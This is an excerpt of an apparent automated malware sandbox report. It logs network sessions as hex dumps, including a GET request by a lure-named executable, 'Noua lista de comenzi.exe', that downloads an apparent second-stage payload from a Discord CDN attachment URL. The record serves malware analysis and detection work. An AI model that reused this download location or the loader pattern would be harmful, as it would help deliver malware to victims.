                                                                                              2022-01-28 18:02:46 UTC978INData Raw: 5b ad 60 d0 f3 3c ce 12 f5 2c f0 c9 ed 42 7a e8 88 ac 1e d7 7b 68 4d c9 18 1b a0 93 6d 8b 3e 86 8c ce 60 2d 30 aa 24 ad 93 2a b8 44 4a 72 78 12 0b d0 4a 48 a7 f6 ab ee 8b 4c 12 f5 2e ba b3 cf 17 92 4a ba 18 61 54 e6 3f 47 ed 42 75 c5 be 9e 09 76 12 2a fe 97 1f 55 26 b8 3f 02 1e d8 f5 39 96 5f 52 22 8b 3e 84 d1 65 d2 7a ea ca 1d aa 05 e3 5c 37 18 11 6f 01 5c ca bf fe 97 1f 55 3a fd 6b 91 2f 2a 4f b3 ac 6a 13 7d 83 44 f2 4b 1e 8c fb 1e d7 7a 1d 2b 47 ed 42 7b 9c f9 50 56 47 e3 97 08 88 3b f1 5f e8 cf 90 b0 a4 0c 77 72 ff 15 91 45 86 cb 9a 96 17 7f da 0e fe dc a9 f1 38 95 da 81 2a b8 4b e1 62 42 0e 00 24 c9 00 33 a6 84 2d ef 7a ea ca 1e d4 71 f3 33 21 4d d9 1c a8 74 f9 2a 31 31 a1 fb e0 b3 9f 0b 87 4b e4 a8 06 14 f0 b9 c3 c4 58 41 fd 17 1b 49 6f 7b 99 29 7d
                                                                                              Data Ascii: [`<,Bz{hMm>`-0$*DJrxJHL.JaT?GBuv*U&?9_R">ez\7o\U:k/*Oj}DKz+GB{PVG;_wrE8*KbB$3-zq3!Mt*11KXAIo{)}
                                                                                              2022-01-28 18:02:46 UTC994INData Raw: ac 6a e4 56 50 a6 f2 49 e8 4d a1 3a fb 0a 1e d7 7b 92 ed 54 70 04 19 8d 4a 72 00 db 8e 4c 25 66 a7 84 57 3a 5e ad 70 eb 3e 1f f2 10 5f 90 7d 62 28 49 01 b6 50 56 c4 84 c7 23 b4 af dd 32 5d f8 21 b4 55 c2 c3 da 0d 17 c7 b7 77 00 d0 0a b0 66 16 51 a5 df dc 9a 98 9d 9c 05 80 f8 0c 77 72 ff d8 56 50 a2 8c 06 2d 23 f0 cd 8a 7b 13 73 7c 56 f0 ac 53 ba 59 15 1c 6b 13 8c 47 69 ea ca 1c dd ab fb 22 b8 66 d1 bd ca 1c dc 58 69 81 61 de c1 fc 6c 92 b8 4b e3 a8 f0 ac 6a 13 f0 f8 b1 5a c2 cb 01 ff ea 87 ce e8 31 15 9c e7 ac ff bb d0 b7 bf 4d d9 cc 2e a6 c3 d8 e3 e6 a0 88 c6 ab dd 7b 7c 4f ab ec c5 65 e9 5a c8 2d 8a f8 b5 68 6e 1e 6d ff 14 f0 08 5d a2 ba 32 b4 ff 66 e2 20 2e ff 66 ed bd 45 76 88 c6 27 3e da e4 e6 a0 a5 30 9f 7f 5d b5 67 d8 ef 04 6d 7c 4f ad 71 0b 87 49
                                                                                              Data Ascii: jVPIM:{TpJrL%fW:^p>_}b(IPV#2]!UwfQwrVP-#{s|VSYkGi"fXialKjZ1M.{|OeZ-hnm]2f .fEv'>0]gm|OqI
                                                                                              2022-01-28 18:02:46 UTC1010INData Raw: 64 89 31 a1 fc 7b bc aa 6f 89 f9 56 47 ed 40 0f 6a 1c 66 6f aa 1b 81 2e 36 56 47 76 73 83 42 0f ea 60 12 39 11 78 f4 a4 69 39 1e 6d f9 03 e8 c2 45 5b 16 e4 e1 1d 4a 11 d2 34 3c 93 5e 96 03 88 d2 08 0f c8 2d 26 fe 97 1f f3 fa b6 af 1d a6 84 95 32 19 11 ff eb 59 6e 9e 61 dc 75 d1 2c 16 d4 cf 9f 1f 54 4c d4 ee d6 c2 31 26 c7 eb 5f a0 32 d1 0d 7d 73 8f a3 ee b6 cb 3c 2f 8e 88 0a 0a 0a a1 a0 9f 32 d7 68 b2 2e ad e7 f7 8d 2e 52 ae 9b eb 0d 02 1e d7 7b 21 58 fb 6a 13 73 da 8d 2e aa c5 dd 7b dd 1e 78 fc 26 b0 5f af ea d1 9d ee 3f 44 ec 29 4e c2 1e d7 84 a4 f9 de 17 e7 0c aa 60 97 6d 27 c0 c9 64 dc 79 92 39 e6 41 22 ba dd a3 01 3a 08 f0 aa 95 b2 f0 84 1c dc ee da ad f0 14 ff ae 16 34 e8 54 83 53 55 4e a4 6f 5e a5 56 78 23 6d ff 19 17 7f ef 4b f0 09 fa 97 d3 2c 1f
                                                                                              Data Ascii: d1{oVG@jfo.6VGvsB`9xi9mE[J4<^-&2Ynau,TL1&_2}s</2h..R{!Xjs.{x&_?D)N`m'dy9A":4TSUNo^Vx#mK,
                                                                                              2022-01-28 18:02:46 UTC1026INData Raw: 72 93 17 7f a2 7c 1b a4 38 94 a7 f7 01 cb e8 cf 90 b0 0c 7f 2f d1 8a c1 b5 95 5f 96 a2 83 52 1a 9b 63 56 fb 6a ec 3a 70 62 53 3e bb b9 c8 22 80 1c cb 35 04 a3 75 d8 f8 a6 78 c7 de 9b ea 35 e5 ad 70 fb e1 9e c7 de 19 9c 6c e1 9e 9d 92 d2 08 0f 36 5c 20 7e 13 cf e4 75 54 f6 d9 95 b0 58 fb 68 ff a8 00 24 c7 f5 f2 a1 81 a2 7d a9 af e1 cb e8 3d 13 73 7c b4 98 8a 46 8a 3f 2d 6e 0a a0 fa 51 59 40 94 23 36 9a 3f 76 03 26 b6 8f 42 e1 ae 64 b8 cc e8 9f 9b 82 7f 62 e4 d9 cc 61 aa 6f 87 1a 9b 63 a5 fc 9d 47 97 69 96 a2 82 9a e2 a9 f1 38 95 56 3d 71 be f7 85 4e 5b bb b0 64 5d a6 0d 28 81 fc 1b a3 ec 72 c5 52 25 ba b9 37 16 31 26 c2 31 af f5 12 81 7f 29 96 cd a9 18 a9 cd 64 6c 32 51 9c af 11 37 2a 4c 2f 17 9e c1 88 31 69 aa 97 50 6a ea 85 72 05 d8 c4 d7 34 a2 7f 12 2b
                                                                                              Data Ascii: r|8/_RcVj:pbS>"5ux5pl6\ ~uTXh$}=s|F?-nQY@#6?v&BdbaocGi8V=qN[d](rR%71&1)dl2Q7*L/1iPjr4+
                                                                                              2022-01-28 18:02:46 UTC1042INData Raw: 0a 8d c6 b6 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 2f d4 92 c7 9b 61 27 af 6f 0b 3d 8c 2d ae f2 3b 92 05 2d c2 b6 af 29 e1 e6 2b f9 33 a6 86 07 a1 81 a7 3f a9 76 0b 4e c4 ab 13 ba e5 d0 f2 7f fa 26 3d ce a1 81 a7 6f 59 40 80 24 34 19 9c 02 d9 89 bc bf 46 8f cb 65 5f 50 a9 0e ff eb b7 32 5c c8 dd 93 d5 7f a2 7c 1a 1e 28 42 85 c9 60 bc 87 76 80 67 08 9f 86 40 ee 50 ea 70 f2 31 d9 bd 65 27 c0 fa b6 d7 84 1c ef ba b9 01 0a 8d c6 ee 5f 28 42 b3 7b e0 1b 97 b8 cc e8 06 a7 71 7e 78 88 39 ee 3f ed c5 56 d5 9f f4 4f 26 3d f8 59 40 80 24 38 6b 6e f6 54 b3 27 c0 c9 60 d2 f7 d6 01 5e cd 6a ec 3a 08 f0 29 25 2a 30 38 07 0b 0a 90 38 24 53 52 cf 1b f2 0c f4 37 e9 86 10 7d 9d dc f9 a3 fe 5b 89 c4 d3 4c cb 1d a6 b0 c0 b1 22
                                                                                              Data Ascii: ;0W;0W;0W;0W;0/a'o=-;-)+3?vN&=oY@$4Fe_P2\|(B`vg@Pp1e'_(B{q~x9?VO&=Y@$8knT'`^j:)%*088$SR7}[L"
                                                                                              2022-01-28 18:02:46 UTC1058INData Raw: b1 2b b2 a7 f0 85 60 5b 8d 4f 40 90 ae 5a 0b f1 0a 7d 5a 4a cd aa 1b 62 8c 1d 60 59 bf b9 cb 12 e2 20 2e 52 c9 d8 0d 09 0b 7d 8d 8e b3 a6 94 b3 d8 f8 a5 88 d1 b3 ac 8e 3c 80 a1 09 f8 7d ce 12 c9 eb b0 d5 89 39 1e a3 e2 73 7c d9 02 e6 5e 1a ac a8 ed 6a 5e e8 56 91 a7 de a5 3e 1d 89 ce 3a c1 76 6d 70 b8 3f 9b 1c 10 dd 18 4f 75 88 79 1f 68 18 e6 d4 4c 77 91 80 af 1d e6 a6 45 56 7b 13 73 7c e6 f0 ac 56 33 d9 fd 3d 7d 9d ef c2 a9 b5 28 a9 d5 4c 9b 9f 8c 46 9c 8c 7e 18 6d 0c ff f9 cf 52 b9 dc ca d0 e9 59 98 e9 61 aa 4a 11 8b b2 a7 e0 98 04 af 12 7e c8 6c 18 98 04 e2 68 6c 97 b3 e7 26 fe 68 e7 bf 4d c8 dd 93 d5 ad a0 0f 87 a6 ae 8e b7 34 15 91 a8 8e 58 96 60 51 ec b1 e1 c4 8b 98 46 a3 27 5b 41 26 41 dd 91 f4 23 6c fe 68 e5 8c 0f 03 05 f3 ce c9 1c fa 7a 29 1c 2f
                                                                                              Data Ascii: +`[O@Z}ZJb`Y .R}<}9s|^j^V>:vmp?OuyhLwEV{s|V3=}(LF~mRYaJ~lhl&hM4X`QF'[A&A#lhz)/


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.349749162.159.134.233443C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-01-28 18:02:55 UTC1066OUTGET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1
                                                                                              User-Agent: 84
                                                                                              Host: cdn.discordapp.com
                                                                                              Cache-Control: no-cache
                                                                                              2022-01-28 18:02:56 UTC1067INHTTP/1.1 200 OK
                                                                                              Date: Fri, 28 Jan 2022 18:02:56 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 514560
                                                                                              Connection: close
                                                                                              CF-Ray: 6d4c2273dbf0921f-FRA
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 30064
                                                                                              Cache-Control: public, max-age=31536000
                                                                                              Content-Disposition: attachment;%20filename=Tdfgwnfyyvslxmhqyfimidqqywchnji
                                                                                              ETag: "f493f19d3321c61c6a854faf08b9664e"
                                                                                              Expires: Sat, 28 Jan 2023 18:02:55 GMT
                                                                                              Last-Modified: Fri, 28 Jan 2022 04:41:10 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              x-goog-generation: 1643344870150958
                                                                                              x-goog-hash: crc32c=09/Jdw==
                                                                                              x-goog-hash: md5=9JPxnTMhxhxqhU+vCLlmTg==
                                                                                              x-goog-metageneration: 1
                                                                                              x-goog-storage-class: STANDARD
                                                                                              x-goog-stored-content-encoding: identity
                                                                                              x-goog-stored-content-length: 514560
                                                                                              X-GUploader-UploadID: ADPycduHCmb3LIfL2HH4XBq8eRR0n39PUKp2MeqZwSE8DOng62cOfzZ1Kz-CCFAHvwp8mOq3bGQUC_Ncitc9O8DBsdE
                                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q3jnZzrraZzlQk1H6Q60c54uiWUDguoz1%2FudbdgDtPxBZM06hcIgK9BeowSoKDThBI4sQccrgvc3HFmAqbtduB2jdd17UH%2FZESk1%2BUep4jqIgLis0SzQf37Hp%2F9KrdXZ%2Fos5gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              2022-01-28 18:02:56 UTC1068INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                              2022-01-28 18:02:56 UTC1068INData Raw: 06 a5 4a de 52 ef 92 0b 20 69 27 89 f8 1d e7 fd a1 b7 7b dc 55 77 dd cb 3d bf 08 b9 73 c7 1a 4e e3 ed f4 0b 3c 37 b9 6f 21 f7 98 2b 8e 0c bb 6c b6 e1 d7 c0 8d 87 e6 73 db c9 2e 1b e5 ec 7b c8 9a 29 8c 07 29 84 7f fa 06 ac db c7 1f ef 83 fc 24 76 42 c1 0f c3 01 06 b3 60 9c 25 fe 2c 0d 2d 88 77 c4 97 a4 c0 99 bd 19 db c0 80 60 96 1c 73 c4 9d a6 c2 8a 7f f2 11 df de 58 f7 92 17 d6 51 6b 20 67 20 6a ad 48 cc b0 e7 e3 ea 71 3a 31 89 fb af 54 f7 92 12 5a 9b b2 e2 6e bf 02 a5 42 d5 38 25 f3 88 7d dc 41 5a 9b ad 56 f1 83 e8 71 2e 15 df d0 b6 eb f6 04 be 9c 2b 84 66 a6 c2 8f 9b ad 56 f1 83 e8 71 2e 0a ad 5f 1e 61 11 c3 10 55 71 30 1e 6c b5 6c a1 a1 a1 be 8a 77 c9 24 79 c2 89 f2 00 9f b0 e1 ce b5 75 cf 21 f9 9f b0 e1 ce aa de 5f 14 4b 5d 1a 46 d7 c3 1f e2 64 98 23
                                                                                              Data Ascii: JR i'{Uw=sN<7o!+ls.{))$vB`%,-w`sXQk g jHq:1TZnB8%}AZVq.+fVq._aUq0llw$yu!_K]Fd#
                                                                                              2022-01-28 18:02:56 UTC1069INData Raw: c9 40 d2 aa f7 80 7f ca 83 c4 bb 1c 03 05 03 38 39 88 62 bb 67 0f d9 a9 53 58 dc 45 6a b7 62 b0 c3 3a 23 dd fb be a5 58 ed ef 90 22 5e 9d 8b a3 a3 ad 4b 7a 4a c9 32 31 86 65 0f d7 d2 91 8b 9a 09 11 d5 29 a5 62 b5 46 d0 9c 05 37 84 42 e6 49 7d c9 0e a1 93 86 64 b8 d5 2f 8a 68 83 f1 9a 3a 1b cd 04 b9 5e ae fb 85 dc 72 62 bb 50 c4 8d 98 01 0c ae c0 9d b1 48 f8 37 8a 63 3d 9a 07 06 89 d8 5c 9a 36 08 a2 17 ca 89 e9 e9 dc 78 76 5f 30 04 81 c6 b2 f5 b7 69 0a a8 d5 2d ef 97 80 79 cf 0e aa f7 b7 56 d9 d8 67 44 ec 51 42 d1 14 52 f0 25 d8 51 41 59 28 19 f4 2d a4 e7 cb 34 0b 2c 22 55 16 49 42 e4 78 40 df cc 82 4a fd 82 7b c5 35 85 ef ac fd 84 4c ff 88 69 03 09 1f fe 09 27 94 3c 56 d5 2d ef a4 ea 5c a3 94 03 3d 99 b0 f3 ec 58 ed d3 2a 12 68 b5 46 ec 52 c9 0e ac c8 b7
                                                                                              Data Ascii: @89bgSXEjb:#X"^KzJ21e)bF7BI}d/h:^rbPH7c=\6xv_0i-yVgDQBR%QAY(-4,"UIBx@J{5Li'<V-\=X*hFR
                                                                                              2022-01-28 18:02:56 UTC1071INData Raw: b9 5f 38 34 00 80 77 df cb 09 1e 78 74 64 81 f4 1c 45 52 fd b4 c7 04 b7 62 82 7c 7c 41 59 2e 30 05 3e 1b c0 ab 78 4f 48 fd b9 5a ae f8 3b 99 b1 4c c1 21 e3 f3 a8 ea 65 01 08 94 05 35 b9 5c a4 ef 9d 86 57 5b 21 dd f0 26 51 40 ed e3 fd 85 e3 f7 8d 92 0d 17 fb 8f a8 d6 66 80 44 e1 fc 07 36 34 30 39 bc d4 a1 93 80 7f cc 81 c1 1f cb 36 01 3f 97 b0 c6 83 cf 32 02 b3 07 38 0b 25 e7 cc bd 26 5c ac f4 1e 48 b4 cc 83 c2 9a 06 b6 f1 a6 e4 73 ee 64 b4 f1 af 7f c9 06 8d 97 8a 6a 82 4c bf 1b f4 2e 0f d2 a8 de 7c 7a 72 64 8d 9b 89 dd cd 04 8e 2a 24 58 dd c3 3b 99 89 e9 d3 2e 06 8f eb da 5e ed db e5 c1 20 44 d1 2b ab 46 dc 31 bb 6f 17 c7 0e 9d bd 2a 24 50 ce 83 ff b6 c5 00 b3 71 20 7f f1 aa f1 a9 6a cc 84 48 b4 f8 04 81 f1 9c 04 86 5c a0 57 1b c7 30 0c a8 ed e6 47 49 7c
                                                                                              Data Ascii: _84wxtdERb||AY.0>xOHZ;L!e5\W[!&Q@fD64096?28%&\HsdjL.|zrd*$X;.^ D+F1o*$Pq jH\W0GI|
                                                                                              2022-01-28 18:02:56 UTC1072INData Raw: 11 e6 49 7c 45 63 33 81 ca 8e 2b a8 e1 ca 8d 98 08 a3 ae ff 8a 6e a8 dd f7 8b 9c 31 b2 c9 0e a0 1e 4b 7c 7e 72 63 38 07 01 33 80 7a 76 59 14 54 e7 f3 a6 ea 5b 26 60 b5 4f 46 e4 47 76 50 fb b0 ce bf 2d 92 39 bb 67 0a 9c 0a a1 99 b6 c8 bc d5 2f b2 fe 0b 25 e4 77 ad 4d 41 5f 0d 1c 76 6c 90 2a 26 6c 91 f0 22 58 d0 a6 e7 f0 1a 7f c0 9f 99 be ac ce 85 d3 11 e1 f8 08 9a 33 b0 c6 f8 04 b3 46 d2 a7 56 ed d7 e4 42 e1 cf 32 3f 9c 32 32 34 03 00 bb 5f 00 b1 48 f8 0c 9b be 90 2a 67 09 21 90 28 29 ac fe 02 ba e7 cc bd 12 2a 25 e9 dc 41 57 59 12 61 36 0e 98 0c a9 53 5b 13 e4 73 dd c2 9d 82 4b 72 64 fc 0f e5 88 6b 33 b9 61 0e 97 80 4c f7 f6 74 60 b9 6c a3 98 39 82 71 15 ca c3 0c 93 b7 66 85 ea 65 38 08 9b b9 5f 38 34 00 80 77 df cb 09 1e 78 74 64 81 f4 1c 45 52 fd b4 c7
                                                                                              Data Ascii: I|Ec3+n1K|~rc83zvYT[&`OFGvP-9g/%wMA_vl*&l"X3FVB2?224_H*g!()*%AWYa6S[sKrdk3aLt`l9qfe8_84wxtdER
                                                                                              2022-01-28 18:02:56 UTC1073INData Raw: b6 67 62 56 56 b1 6d 21 a3 6a 26 63 c4 21 ec aa dc 1d 25 3b ae fc 01 da 2e 8b bf dd 4d 37 6d d3 1d 33 69 67 0c f8 d4 43 5c 4c 3f f1 40 65 46 64 47 aa f9 d7 85 4c f2 71 a3 a3 9f 67 65 8d ce 6a 48 99 25 0a 96 d7 79 98 ac 63 3f 7b 33 b7 ab 1e e5 71 7b 95 90 f5 88 33 e2 c1 20 3f cc 4a fd d8 77 85 a2 36 66 a5 e8 66 dc 34 6b 74 4b 57 1f a7 0d 3a c0 47 60 9d 83 b6 32 fd 8a ab 6e 60 fb a4 d4 f6 2b ea 21 22 4e b2 3c 5c cb fc 12 1b 3a 0c e9 de a6 97 60 33 80 b2 1a 42 04 4d 78 cc 76 80 92 5c 17 b5 2d 73 8f 5d 26 fa 9f 6d c9 65 d1 92 20 d3 f8 bb 28 d6 ba de 08 fe 89 df 51 f1 ae f9 43 7b 84 ec 73 08 91 0b 72 d3 58 36 cf 74 70 3b ff 44 13 8d 6f d9 37 c2 04 b4 5f a3 14 8a 52 59 6c 45 68 db a0 a6 5a 91 d1 9a e0 4d a0 24 37 0f 6b 88 b2 cb e3 1c 3e f1 ab 95 84 3a bb e3 37
                                                                                              Data Ascii: gbVVm!j&c!%;.M7m3igC\L?@eFdGLqgejH%yc?{3q{3 ?Jw6ff4ktKW:G`2n`+!"N<\:`3BMxv\-s]&me (QC{srX6tp;Do7_RYlEhZM$7k>:7
                                                                                              2022-01-28 18:02:56 UTC1075INData Raw: cb 55 a5 3f 93 b0 f3 6b 65 48 4d 50 37 d1 2d ab 4d 3a 6f 65 41 75 19 af 7b ce 85 5e b6 d5 f2 3e e4 5a ab 7e 4c 63 86 e9 0f fb 79 d9 d1 12 56 50 d4 8c d3 07 f0 08 d0 9f 91 19 9a 69 ba 91 4e df cb 0c a5 98 f9 57 8b bd cc c0 a0 10 64 d9 87 bd 5a b2 21 c8 8f a9 5d 71 e1 14 d7 af 82 5c a0 1d ca e3 b6 b9 33 ee a4 fa 3b a7 64 62 c3 50 67 10 8e 6a 80 49 43 83 17 30 4b 33 4e d1 25 d4 9e da 24 49 3a 00 44 f8 03 0b 2d 0c a1 aa ed d2 68 8c 22 5f 0c 13 55 f4 f5 f7 55 55 62 89 d6 72 48 af b0 89 3b d3 12 5e aa 08 3e b7 57 15 0d 1f cc 86 14 1f a3 eb a1 d7 0c 91 80 75 e6 bd de 8a 3f d2 7f f1 9f 99 84 f3 0e 2b 23 cc 6b 0d 14 65 3f 24 2c 52 00 aa 0a 9b b0 c9 34 a4 91 c7 e5 8f 53 38 32 02 bf 79 6e 08 d5 0d f6 5d 2a 29 a1 ad f0 ac d6 26 ad 18 4f 75 d4 dc 9e ea dc 64 57 25 d1
                                                                                              Data Ascii: U?keHMP7-M:oeAu{^>Z~LcyVPiNWdZ!]q\3;dbPgjIC0K3N%$I:D-h"_UUUbrH;^>Wu?+#ke?$,R4S82yn]*)&OudW%
                                                                                              2022-01-28 18:02:56 UTC1076INData Raw: 7c ad 35 69 46 d8 65 3e 47 eb 5c ea 13 0a c5 3c 13 e9 e5 4a 66 de 6b f1 b2 f5 b3 79 8a 55 6f 1c 54 34 43 5c 96 39 30 33 8a 49 6e 7d bf 24 18 70 c0 3a 98 15 bc 25 e2 76 65 0e 69 ab da 69 1d 22 50 fe 0a a3 90 09 45 a7 7c 84 4e c7 0a 99 f9 da 0c f5 ff 7a 4f 06 8c 16 7b a1 c6 26 47 92 3b a5 68 8f 53 e9 67 33 f1 54 d3 1f cc 8f 2b 06 30 e0 3d 64 be 9e 1a 42 44 41 c5 af 6f f5 85 dc 4d 01 8b d1 6d c9 0f 04 ea 56 e4 71 21 fe 5c 2e 7b 12 01 09 27 94 25 f7 ef 1d d0 7d 8b 97 b6 fa 4b 3f de 80 5d d6 16 72 62 b6 61 02 b7 4c e7 2c 5e ac f4 26 ef eb c0 51 02 7f bf 25 9a 3a f3 06 3a 15 b9 b4 b3 4f 46 e5 6c e1 8a 97 9c e0 06 81 c9 3d 8f 75 21 3b d5 e5 6a 80 4f 4b 3d c2 b1 c3 26 be 1e 4a c6 89 20 a4 17 9c 44 0e 3c 2f b9 5d c2 51 a7 1c 53 bc 65 09 16 48 10 e8 dc 63 70 62 7b
                                                                                              Data Ascii: |5iFe>G\<JfkyUoT4C\903In}$p:%veii"PE|NzO{&G;hSg3T+0=dBDAoMmVq!\.{'%}K?]rbaL,^&Q%::OFl=u!;jOK=&J D</]QSeHcpb{
                                                                                              2022-01-28 18:02:56 UTC1077INData Raw: 71 5a 57 47 9f a6 e3 c4 b2 23 fb 2f 9d 9e f5 b5 73 e1 cd 0e a9 17 f5 fa c1 29 a1 93 b9 af 60 37 5c f8 c2 ee 55 62 ba 9e 28 68 0a 81 2c 49 48 f9 8f bb 72 18 1e 07 fd fc 38 05 0a eb 4f 9b 97 90 d1 62 82 42 d0 64 b2 e5 dc 7e 80 34 0f ee 63 de fd 2d 6f 5f d3 7a 42 db e4 b6 54 d7 0a dc 96 41 61 01 39 34 45 85 a2 52 32 5b 21 de 36 ad 4d 01 17 b9 bf 56 e3 f2 27 68 82 b6 bc 90 c6 19 cf 02 80 6e 93 37 4a e3 20 f7 b0 ca 83 ac 0a 03 81 d6 9b 30 01 37 bd 42 80 d7 b3 00 43 dc 44 d4 a2 1a 99 2a e0 69 e2 8c 2f ba dd 34 62 fc f3 eb 27 6d 2e 01 02 a5 13 20 05 1d 2d 74 59 21 ef 71 3b a9 a6 ad 85 1f f1 ab 4d 64 4d d2 7b ea bd e9 da 58 d6 0c 17 b9 c2 e8 bb 9b bc ee 6f 9f da 1c 31 a3 67 d9 e0 78 72 52 b0 a3 1a 6a 6c f7 bf 18 44 55 53 be d1 53 b7 c1 2b ab 7f 3c 2d f9 fd cb e5
                                                                                              Data Ascii: qZWG#/s)`7\Ub(h,IHr8ObBd~4c-o_zBTAa94ER2[!6MV'hn7J 07BCD*i/4b'm. -tY!q;MdM{Xo1gxrRjlDUSS+<-
                                                                                              2022-01-28 18:02:56 UTC1079INData Raw: fa 75 39 ce 98 fc 6d 1c 72 6c c4 ab 9b da 22 a2 63 06 8c 16 14 76 45 d1 0f 02 f4 16 7f ca 48 1f b9 6d 5b d6 d5 15 f6 33 86 4d 73 2f f2 d5 a1 ac fe 34 6b 61 7d 32 2e de d6 60 8e 68 39 87 39 e3 cc 6e 27 a7 55 62 43 74 bf 81 8e c2 60 81 f3 98 d1 44 ee 8e 3e f4 f4 15 c7 0e 17 3f ba c3 28 de a4 eb d5 1e 06 e7 3c 23 cd eb 18 74 67 0d 1a 5f 7d 00 f5 4f 9e 16 34 3c 74 8b 2a ec 12 89 08 94 38 01 13 9c bc f1 bb b0 18 7f cc b5 83 ba 54 19 ba 23 b9 57 50 c4 db ed 54 27 b7 b1 ce 83 f0 15 65 fc f4 21 98 e6 d6 54 de 7c d1 af 95 87 c6 55 da 56 dd cf bc 01 44 df b3 be 26 6e a8 e9 41 1d 5c 81 dd 0e 01 07 08 9c 8e 60 fa c2 e9 3f 05 34 0f de cd 9f fd b1 56 30 a7 5e a4 d2 e5 11 fa b6 9f 79 7f f8 39 b8 3b 10 27 5f 7c 8b 0a 92 0e 92 9f f3 5b ea 49 89 7c 7a 7e 49 93 dc 4d ce c7
                                                                                              Data Ascii: u9mrl"cvEHm[3Ms/4ka}2.`h99n'UbCt`D>?(<#tg_}O4<t*8T#WPT'e!T|UVD&nA\`?4V0^y9;'_|[I|z~IM
                                                                                              2022-01-28 18:02:56 UTC1080INData Raw: 71 25 dd f3 c0 a7 92 86 3b 7a fb f6 d4 43 09 ea 5c 88 1b b7 8b 98 36 0e a4 a1 b5 54 b7 95 8c 24 67 06 b0 b1 76 93 1d ac 01 a9 0d e6 7a 2d ba b1 85 d8 6a 8c 12 2a 71 54 bc 10 64 b1 40 d1 23 b1 41 8a f7 d6 8b 39 f2 c2 a9 46 fe 6b c8 88 67 0d 2e 72 47 69 70 57 53 52 f3 92 0e f6 3e ff 2e 44 0b 8b dc 9a 06 aa eb b2 18 7c 44 ee 6d 27 80 08 e7 15 c3 3c 15 cf 08 f6 32 db 48 89 25 11 81 2d 90 31 f0 47 b7 53 5f 3a 16 47 51 14 0f 33 f7 f6 32 00 b8 af 76 ab c5 5c a8 d7 d9 e8 ad dd 85 b5 a0 79 f3 ec 5c 41 c3 4c 4f 5c 5c 2c 4f b4 6f 7d 95 e9 27 d5 7f ae fd b7 7b ee 30 d5 5d 74 5a c1 e6 5a a3 ab 79 f2 c4 63 ce ff 5c ea 6b 00 bc de c0 b3 a6 f1 8e 28 47 b7 13 df cd 0e df 12 f6 da 07 d2 de 7d f7 8a 60 90 3a 6c 33 a6 17 b0 93 8e 53 91 ff 8f a3 99 8b d4 cd 8e c1 4d e4 03 f4
                                                                                              Data Ascii: q%;zC\6T$gvz-j*qTd@#A9Fkg.rGipWSR>.D|Dm'<2H%-1GS_:GQ32v\y\ALO\\,Oo}'{0]tZZyc\k(G}`:l3SM
                                                                                              2022-01-28 18:02:56 UTC1081INData Raw: b4 71 f5 ce 65 b7 52 79 63 58 21 62 b9 73 d7 97 5d 12 58 ee 6a ba 3b 28 77 8e 09 26 22 70 89 b7 8d 9a 0a 9c 33 b3 ac 76 90 49 20 57 24 e1 ce 79 71 1b 03 02 b4 ce b0 fd 7d 76 9e 72 44 fc 6f aa cf e4 c7 0d 32 3b e5 04 87 d2 a5 57 60 15 49 84 2e 8f 05 6e 75 4d 4d a8 4e c4 93 84 35 58 d7 e8 6d 1e 7d 04 0e bc b4 3a b7 51 60 b0 ab b1 7f fe 0b 25 e4 b3 f0 7b 95 e4 09 71 48 ec 30 80 00 4c 58 dd 27 94 35 b0 c1 16 8e 8d 8a 25 f4 69 68 29 ec bc 75 e6 6e a4 92 f5 84 4a ba e4 70 2b 33 e4 29 5e 84 3e a1 16 41 5c 78 1a 8a d7 e4 27 4b 9d 8d e6 42 0b 1e 1e 4a 97 46 d4 ac f8 0b 58 3c bd 02 e1 26 59 1e 49 41 56 8c 1a 02 6b 18 2f b1 31 66 ba de 71 10 56 23 59 cf 6a 48 f5 80 77 e3 c2 13 d3 ef 29 a6 b2 f0 52 15 f8 05 00 bb 54 3f 0a 7d 96 e2 40 d2 92 08 9c a2 14 96 ab 46 36 3b
                                                                                              Data Ascii: qeRycX!bs]Xj;(w&"p3vI W$yq}vrDo2;W`I.nuMMN5Xm}:Q`%{qH0LX'5%ih)unJp+3)^>A\x'KBJFX<&YIAVk/1fqV#YjHw)RT?}@F6;
